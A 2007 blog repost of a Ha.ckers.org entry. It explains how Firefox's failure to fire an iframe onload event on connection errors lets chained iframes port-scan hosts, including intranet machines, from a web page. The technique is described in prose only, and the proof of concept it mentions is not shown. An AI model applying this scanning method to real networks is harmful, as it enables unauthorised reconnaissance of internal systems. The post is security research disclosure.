Sunday, January 21, 2007

Porting Scanning Clients via IFRAME

Via Ha.ckers.org -

A recent thread on sla.ckers.org discussing a vulnerability in neopets actually got me thinking. Spikeman posted that you could detect once the page had completed loading in an iframe using an onload event handler. More timing attacks anyone? Well that’s not all. In Firefox it actually has a peculiar behavior. In IE (as it should) the onload event handler works all the time, because the page has finished loading. In Firefox it doesn’t fire if the browser encounters an error. An error could be something as simple as the server is not up (I have not tested with other server errors).

This proof of concept shows the difference (try in IE and Firefox to see the difference). You can see that in Firefox a series of iframes can be chained together to do port scanning (including Intranet port scanning). This is obviously a known issue when talking about JavaScript includes, but this is the first time I’ve heard of anyone discussing using an iframe for this purpose. Yet another way to do cross domain leakage (and cross firewall leakage at that). Thanks to Spikeman for alerting me to the onload event handler in iframes.

No comments:

Post a Comment